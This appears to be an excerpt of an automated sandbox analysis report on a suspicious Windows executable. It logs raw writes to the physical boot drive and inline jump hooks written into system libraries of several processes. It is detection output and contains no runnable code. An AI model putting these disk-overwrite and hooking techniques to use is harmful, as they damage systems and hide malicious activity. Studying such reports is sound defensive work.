            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe | Code function: memset,CreateFileA,DeviceIoControl,DeviceIoControl,WriteFile,DeviceIoControl,CloseHandle, \\.\PHYSICALDRIVE0 | 33_2_00099EC0
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe | Code function: VirtualAlloc,CreateFileA,DeviceIoControl,SetFilePointer,WriteFile,WriteFile,SetFilePointer,WriteFile,WriteFile,DeviceIoControl, \\.\PHYSICALDRIVE0 | 33_2_00099D90
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe | Code function: memset,CreateFileA,DeviceIoControl,DeviceIoControl,WriteFile,DeviceIoControl,CloseHandle, \\.\PHYSICALDRIVE0 | 34_2_00229EC0
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe | Code function: VirtualAlloc,CreateFileA,DeviceIoControl,SetFilePointer,WriteFile,WriteFile,SetFilePointer,WriteFile,WriteFile,DeviceIoControl, \\.\PHYSICALDRIVE0 | 34_2_00229D90
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe | Code function: memset,CreateFileA,DeviceIoControl,DeviceIoControl,WriteFile,DeviceIoControl,CloseHandle, \\.\PHYSICALDRIVE0 | 35_2_00159EC0
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe | Code function: VirtualAlloc,CreateFileA,DeviceIoControl,SetFilePointer,WriteFile,WriteFile,SetFilePointer,WriteFile,WriteFile,DeviceIoControl, \\.\PHYSICALDRIVE0 | 35_2_00159D90
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe | Code function: memset,CreateFileA,DeviceIoControl,DeviceIoControl,WriteFile,DeviceIoControl,CloseHandle, \\.\PHYSICALDRIVE0 | 36_2_007F9EC0
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe | Code function: VirtualAlloc,CreateFileA,DeviceIoControl,SetFilePointer,WriteFile,WriteFile,SetFilePointer,WriteFile,WriteFile,DeviceIoControl, \\.\PHYSICALDRIVE0 | 36_2_007F9D90
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe | Code function: memset,CreateFileA,DeviceIoControl,DeviceIoControl,WriteFile,DeviceIoControl,CloseHandle, \\.\PHYSICALDRIVE0 | 37_2_00259EC0
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe | Code function: VirtualAlloc,CreateFileA,DeviceIoControl,SetFilePointer,WriteFile,WriteFile,SetFilePointer,WriteFile,WriteFile,DeviceIoControl, \\.\PHYSICALDRIVE0 | 37_2_00259D90
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe | Code function: memset,CreateFileA,DeviceIoControl,DeviceIoControl,WriteFile,DeviceIoControl,CloseHandle, \\.\PHYSICALDRIVE0 | 38_2_00269EC0
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe | Code function: VirtualAlloc,CreateFileA,DeviceIoControl,SetFilePointer,WriteFile,WriteFile,SetFilePointer,WriteFile,WriteFile,DeviceIoControl, \\.\PHYSICALDRIVE0 | 38_2_00269D90
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe | Code function: memset,CreateFileA,DeviceIoControl,DeviceIoControl,WriteFile,DeviceIoControl,CloseHandle, \\.\PHYSICALDRIVE0 | 39_2_003F9EC0
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe | Code function: VirtualAlloc,CreateFileA,DeviceIoControl,SetFilePointer,WriteFile,WriteFile,SetFilePointer,WriteFile,WriteFile,DeviceIoControl, \\.\PHYSICALDRIVE0 | 39_2_003F9D90
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe | Code function: memset,CreateFileA,DeviceIoControl,DeviceIoControl,WriteFile,DeviceIoControl,CloseHandle, \\.\PHYSICALDRIVE0 | 40_2_003F9EC0
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe | Code function: VirtualAlloc,CreateFileA,DeviceIoControl,SetFilePointer,WriteFile,WriteFile,SetFilePointer,WriteFile,WriteFile,DeviceIoControl, \\.\PHYSICALDRIVE0 | 40_2_003F9D90
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe | Code function: memset,CreateFileA,DeviceIoControl,DeviceIoControl,WriteFile,DeviceIoControl,CloseHandle, \\.\PHYSICALDRIVE0 | 41_2_00289EC0
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe | Code function: VirtualAlloc,CreateFileA,DeviceIoControl,SetFilePointer,WriteFile,WriteFile,SetFilePointer,WriteFile,WriteFile,DeviceIoControl, \\.\PHYSICALDRIVE0 | 41_2_00289D90
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe | Code function: memset,CreateFileA,DeviceIoControl,DeviceIoControl,WriteFile,DeviceIoControl,CloseHandle, \\.\PHYSICALDRIVE0 | 42_2_00109EC0
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe | Code function: VirtualAlloc,CreateFileA,DeviceIoControl,SetFilePointer,WriteFile,WriteFile,SetFilePointer,WriteFile,WriteFile,DeviceIoControl, \\.\PHYSICALDRIVE0 | 42_2_00109D90

            Hooking and other Techniques for Hiding and Protection

            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe | Memory written: PID: 2384 base: 774CFA50 value: E9 3B 69 F0 88
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe | Memory written: PID: 2384 base: 774CFDA8 value: E9 93 68 F0 88
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe | Memory written: PID: 2384 base: 757158CD value: E9 2E B7 CB 8A
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe | Memory written: PID: 2384 base: 757182ED value: E9 AE 8D CB 8A
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe | Memory written: PID: 2384 base: 7576DF21 value: E9 EA 45 C6 8A
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe | Memory written: PID: 2384 base: 75709AE0 value: E9 8B 8A CC 8A
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe | Memory written: PID: 2384 base: 756F5366 value: E9 55 BE CD 8A
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe | Memory written: PID: 2384 base: 756F3EFC value: E9 8F D3 CD 8A
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe | Memory written: PID: 2384 base: 69CBA9B0 value: E9 3B 6D 71 96
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe | Memory written: PID: 2384 base: 69CA572C value: E9 AF C0 72 96
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe | Memory written: PID: 2384 base: 769A6C19 value: E9 32 06 A3 89
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe | Memory written: PID: 2384 base: 769A4889 value: E9 82 D4 A2 89
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe | Memory written: PID: 2384 base: 76A91D20 value: E9 7B 03 94 89
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe | Memory written: PID: 2384 base: 76A0BF10 value: E9 4B 62 9C 89
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe | Memory written: PID: 2384 base: 76A81610 value: E9 8B 0D 95 89
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe | Memory written: PID: 2384 base: 774D0078 value: E9 53 53 F0 88
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe | Memory written: PID: 2384 base: 774EEB2A value: E9 D1 67 EE 88
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe | Memory written: PID: 1440 base: 774CFA50 value: E9 3B 69 CB 88
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe | Memory written: PID: 1440 base: 774CFDA8 value: E9 93 68 CB 88
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe | Memory written: PID: 1440 base: 757158CD value: E9 2E B7 A6 8A
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe | Memory written: PID: 1440 base: 757182ED value: E9 AE 8D A6 8A
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe | Memory written: PID: 1440 base: 7576DF21 value: E9 EA 45 A1 8A
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe | Memory written: PID: 1440 base: 75709AE0 value: E9 8B 8A A7 8A
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe | Memory written: PID: 1440 base: 756F5366 value: E9 55 BE A8 8A
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe | Memory written: PID: 1440 base: 756F3EFC value: E9 8F D3 A8 8A
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe | Memory written: PID: 1440 base: 69CBA9B0 value: E9 3B 6D 4C 96
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe | Memory written: PID: 1440 base: 69CA572C value: E9 AF C0 4D 96
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe | Memory written: PID: 1440 base: 769A6C19 value: E9 32 06 7E 89
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe | Memory written: PID: 1440 base: 769A4889 value: E9 82 D4 7D 89
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe | Memory written: PID: 1440 base: 76A91D20 value: E9 7B 03 6F 89
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe | Memory written: PID: 1440 base: 76A0BF10 value: E9 4B 62 77 89
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe | Memory written: PID: 1440 base: 76A81610 value: E9 8B 0D 70 89
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe | Memory written: PID: 1440 base: 774D0078 value: E9 53 53 CB 88
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe | Memory written: PID: 1440 base: 774EEB2A value: E9 D1 67 C9 88
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe | Memory written: PID: 2096 base: 774CFA50 value: E9 3B 69 EB 88
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe | Memory written: PID: 2096 base: 774CFDA8 value: E9 93 68 EB 88
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe | Memory written: PID: 2096 base: 757158CD value: E9 2E B7 C6 8A
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe | Memory written: PID: 2096 base: 757182ED value: E9 AE 8D C6 8A
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe | Memory written: PID: 2096 base: 7576DF21 value: E9 EA 45 C1 8A
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 2096 base: 75709AE0 value: E9 8B 8A C7 8A Jump to behavior
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 2096 base: 756F5366 value: E9 55 BE C8 8A Jump to behavior
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 2096 base: 756F3EFC value: E9 8F D3 C8 8A Jump to behavior
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 2096 base: 69CBA9B0 value: E9 3B 6D 6C 96 Jump to behavior
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 2096 base: 69CA572C value: E9 AF C0 6D 96 Jump to behavior
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 2096 base: 769A6C19 value: E9 32 06 9E 89 Jump to behavior
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 2096 base: 769A4889 value: E9 82 D4 9D 89 Jump to behavior
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 2096 base: 76A91D20 value: E9 7B 03 8F 89 Jump to behavior
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 2096 base: 76A0BF10 value: E9 4B 62 97 89 Jump to behavior
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 2096 base: 76A81610 value: E9 8B 0D 90 89 Jump to behavior
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 2096 base: 774D0078 value: E9 53 53 EB 88 Jump to behavior
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 2096 base: 774EEB2A value: E9 D1 67 E9 88 Jump to behavior
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 1804 base: 774CFA50 value: E9 3B 69 F4 88 Jump to behavior
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 1804 base: 774CFDA8 value: E9 93 68 F4 88 Jump to behavior
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 1804 base: 757158CD value: E9 2E B7 CF 8A Jump to behavior
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 1804 base: 757182ED value: E9 AE 8D CF 8A Jump to behavior
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 1804 base: 7576DF21 value: E9 EA 45 CA 8A Jump to behavior
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 1804 base: 75709AE0 value: E9 8B 8A D0 8A Jump to behavior
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 1804 base: 756F5366 value: E9 55 BE D1 8A Jump to behavior
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 1804 base: 756F3EFC value: E9 8F D3 D1 8A Jump to behavior
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 1804 base: 69CBA9B0 value: E9 3B 6D 75 96 Jump to behavior
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 1804 base: 69CA572C value: E9 AF C0 76 96 Jump to behavior
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 1804 base: 769A6C19 value: E9 32 06 A7 89 Jump to behavior
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 1804 base: 769A4889 value: E9 82 D4 A6 89 Jump to behavior
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 1804 base: 76A91D20 value: E9 7B 03 98 89 Jump to behavior
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 1804 base: 76A0BF10 value: E9 4B 62 A0 89 Jump to behavior
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 1804 base: 76A81610 value: E9 8B 0D 99 89 Jump to behavior
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 1804 base: 774D0078 value: E9 53 53 F4 88 Jump to behavior
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 1804 base: 774EEB2A value: E9 D1 67 F2 88 Jump to behavior
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 892 base: 774CFA50 value: E9 3B 69 CE 88 Jump to behavior
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 892 base: 774CFDA8 value: E9 93 68 CE 88 Jump to behavior
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 892 base: 757158CD value: E9 2E B7 A9 8A Jump to behavior
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 892 base: 757182ED value: E9 AE 8D A9 8A Jump to behavior
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 892 base: 7576DF21 value: E9 EA 45 A4 8A Jump to behavior
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 892 base: 75709AE0 value: E9 8B 8A AA 8A Jump to behavior
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 892 base: 756F5366 value: E9 55 BE AB 8A Jump to behavior
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 892 base: 756F3EFC value: E9 8F D3 AB 8A Jump to behavior
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 892 base: 69CBA9B0 value: E9 3B 6D 4F 96 Jump to behavior
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 892 base: 69CA572C value: E9 AF C0 50 96 Jump to behavior
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 892 base: 769A6C19 value: E9 32 06 81 89 Jump to behavior
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 892 base: 769A4889 value: E9 82 D4 80 89 Jump to behavior
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 892 base: 76A91D20 value: E9 7B 03 72 89 Jump to behavior
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 892 base: 76A0BF10 value: E9 4B 62 7A 89 Jump to behavior
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 892 base: 76A81610 value: E9 8B 0D 73 89 Jump to behavior
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 892 base: 774D0078 value: E9 53 53 CE 88 Jump to behavior
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 892 base: 774EEB2A value: E9 D1 67 CC 88 Jump to behavior
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 1968 base: 774CFA50 value: E9 3B 69 E8 88 Jump to behavior
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 1968 base: 774CFDA8 value: E9 93 68 E8 88 Jump to behavior
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 1968 base: 757158CD value: E9 2E B7 C3 8A Jump to behavior
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 1968 base: 757182ED value: E9 AE 8D C3 8A Jump to behavior
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 1968 base: 7576DF21 value: E9 EA 45 BE 8A Jump to behavior
